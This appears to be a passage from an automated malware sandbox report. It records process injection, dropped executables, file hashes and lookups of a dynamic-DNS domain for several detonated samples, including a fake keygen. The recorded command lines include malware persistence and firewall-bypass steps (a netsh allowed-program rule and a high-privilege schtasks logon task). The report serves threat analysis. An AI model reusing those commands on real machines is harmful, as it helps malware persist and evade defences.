PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

Processes

C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe

"C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe"

C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe

"C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe"

C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe

"C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe"

C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe

"C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe"

C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe

"C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe"

C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe

"C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4648 -ip 4648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 1340

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe

"C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3380 -ip 3380

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe" 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 1148

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4524 -ip 4524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 1152

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Windows\svehosts.exe

"C:\Windows\svehosts.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 444 -ip 444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 1128

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\excelsl.exe

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Users\Admin\Documents\excelsl.exe

C:\Users\Admin\Documents\excelsl.exe

C:\Users\Admin\Documents\excelsl.exe

"C:\Users\Admin\Documents\excelsl.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1388 -ip 1388

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 1148

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3044 -ip 3044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1084

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\svehosts.exe" "svehosts.exe" ENABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\svehosts.exe" ..

C:\Windows\svehosts.exe

C:\Windows\svehosts.exe ..

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'prndrvest"' /tr "'C:\Users\Admin\AppData\Roaming\prndrvest.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2083.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\prndrvest.exe

"C:\Users\Admin\AppData\Roaming\prndrvest.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/4648-0-0x0000000075092000-0x0000000075093000-memory.dmp

memory/4648-1-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-2-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-3-0x0000000075092000-0x0000000075093000-memory.dmp

memory/4648-4-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe

MD5 2819e45588024ba76f248a39d3e232ba
SHA1 08a797b87ecfbee682ce14d872177dae1a5a46a2
SHA256 b82b23059e398b39f183ec833d498200029033b0fd3a138b6c2064a6fa3c4b93
SHA512 a38b58768daf58fa56ca7b8c37826d57e9dbfcd2dedf120a5b7b9aa36c4e10f64ec07c11dbd77b5861236c005fe5d453523911906dd77a302634408f1d78503a

C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe

MD5 9133c2a5ebf3e25aceae5a001ca6f279
SHA1 319f911282f3cded94de3730fa0abd5dec8f14be
SHA256 7c3615c405f7a11f1c217b9ecd1000cf60a37bca7da1f2d12da21cc110b16b4d
SHA512 1d1af3fcfcdba41874e3eb3e2571d25798acfd49b63b7fcf9393be2f59c9ba77e563da1717abcd6445fc52fd6d948bf4c0dd5978a192c8e32e0a9279fd0be33e

memory/4616-35-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe

MD5 e87459f61fd1f017d4bd6b0a1a1fc86a
SHA1 30838d010aad8c9f3fd0fc302e71b4cbe6f138c0
SHA256 ec1b56551036963a425f6a0564d75980054e01d251c88eb29c81c1b2182f5727
SHA512 dd13993174d234d60ec98124b71bfefcf556c069e482a2e1f127f81f6738b71cd37cee95bf0119d3a61513c01438055767d480e26d6ed260ee16a96533d0cfa2

memory/4616-56-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-78-0x0000000075090000-0x0000000075641000-memory.dmp

memory/444-81-0x0000000075090000-0x0000000075641000-memory.dmp

memory/2604-82-0x0000000004B20000-0x0000000004BB2000-memory.dmp

memory/2604-80-0x00000000050D0000-0x0000000005674000-memory.dmp

memory/2604-79-0x0000000000230000-0x0000000000294000-memory.dmp

memory/3252-77-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

MD5 9d2a888ca79e1ff3820882ea1d88d574
SHA1 112c38d80bf2c0d48256249bbabe906b834b1f66
SHA256 8b5b38085f12d51393ed5a481a554074d3c482d53ecd917f2f5dffdf3d2ee138
SHA512 17a9f74ecf9f118ed0252fa0bc6ce0f9758a4dc75f238cae304def9c37cd94623818dd4aef38826642ff9e549b7e6047318f8bf6de7edff2d61a298d0bf5c840

memory/2604-83-0x0000000004BC0000-0x0000000004BCA000-memory.dmp

memory/3132-75-0x0000000000400000-0x00000000004BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe

MD5 f07d2c33e4afe36ec6f6f14f9a56e84a
SHA1 3ebed0c1a265d1e17ce038dfaf1029387f0b53ee
SHA256 309385e6cd68c0dd148905c3147f77383edaf35da9609c0717da7df1a894e3ca
SHA512 b4fbf0e6b8e7e8e1679680039e4ac0aebdf7967a9cc36d9ddac35fa31d997253384a51656d886afb2ded9f911b7b8b44c2dcb8ebe71962e551c5025a4d75ebe2

C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe

MD5 590acb5fa6b5c3001ebce3d67242aac4
SHA1 5df39906dc4e60f01b95783fc55af6128402d611
SHA256 7bf9b7b25cf1671e5640f8eeac149f9a4e8c9f6c63415f4bd61bccb10ddf8509
SHA512 4ac518140ee666491132525853f2843357d622fe351e59cca7ce3b054d665f77ad8987adddd601e6b1afe6903222d77cf3c41a5aa69e8caf0dcdc7656a43e9ba

C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe

MD5 3e804917c454ca31c1cbd602682542b7
SHA1 1df3e81b9d879e21af299f5478051b98f3cb7739
SHA256 f9f7b6f7b8c5068f9e29a5b50afca609018c50ffd61929e1b78124f5381868f1
SHA512 28e59bc545179c2503771b93d947930bd56f8ebd0402ecbb398335c5ac89f40051e93fbfd84d35b8c625b253bb4cafea6a5360914b8d54d1bc121977f1eadbaf

memory/2604-85-0x0000000008D10000-0x0000000008D34000-memory.dmp

memory/4648-86-0x0000000075090000-0x0000000075641000-memory.dmp

memory/1504-96-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/3508-103-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3508-100-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1504-104-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-108-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-106-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-105-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-109-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-94-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-91-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2220-117-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2220-115-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2604-121-0x00000000024C0000-0x00000000024D2000-memory.dmp

memory/4616-122-0x0000000075090000-0x0000000075641000-memory.dmp

memory/2604-123-0x00000000024D0000-0x00000000024E2000-memory.dmp

memory/1644-130-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-131-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/3252-133-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4616-146-0x0000000075090000-0x0000000075641000-memory.dmp

memory/444-147-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4864-150-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/4864-155-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/4864-153-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3784-159-0x0000000000680000-0x0000000000681000-memory.dmp

memory/444-212-0x0000000075090000-0x0000000075641000-memory.dmp

memory/1504-214-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2604-216-0x0000000008FA0000-0x0000000009006000-memory.dmp

memory/2604-218-0x0000000009400000-0x000000000949C000-memory.dmp

memory/5028-223-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5028-227-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5028-228-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3632-226-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/5028-225-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1380-233-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1380-232-0x0000000000400000-0x00000000004BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\excelsl.exe.log

MD5 0a9b4592cd49c3c21f6767c2dabda92f
SHA1 f534297527ae5ccc0ecb2221ddeb8e58daeb8b74
SHA256 c7effe9cb81a70d738dee863991afefab040290d4c4b78b4202383bcb9f88fcd
SHA512 6b878df474e5bbfb8e9e265f15a76560c2ef151dcebc6388c82d7f6f86ffaf83f5ade5a09f1842e493cb6c8fd63b0b88d088c728fd725f7139f965a5ee332307

C:\Users\Admin\AppData\Local\Temp\tmp2083.tmp.bat

MD5 cfe60abfaac144fb936e6eb8f0a6cd51
SHA1 9058dfef82c941dc1cb1cf5d884e33a9b838436d
SHA256 cc709d56000aa6641bb0a1117ed34410f6df5c5babafd15b4babba555c3b9757
SHA512 14a7107c9bd2e3becfc62cf544dbcfcfaf04309c661fbdbd8ab0d99ccadb6a781ce759d1c551d5481acf2514cb6500ae7ceec921ce0681ccc20e8a769fa85020

C:\Users\Admin\AppData\Roaming\prndrvest.exe

MD5 0ce6d16105796847ef6d07b1f53e2c06
SHA1 6db0501a2f4e1a63531a2ac7a2c195434214f834
SHA256 6018a68a1addfed3acdb90de571524ee2a03b233e11ed1c2070034c26efbf309
SHA512 7561ec5af2cc592818d1d7eb5469397c44011c7ed90142df8024b5d773adc71a718857e996867487a44e47b8e117c4bf07cf15fd977353a3d8de1957d30922f8

Analysis: behavioral15

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

96s

Max time network

116s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4168 set thread context of 2728 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2728 -ip 2728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 576

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/2728-0-0x00000000008C0000-0x00000000008EE000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:12

Platform

win10v2004-20250502-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

141s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Keygen.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
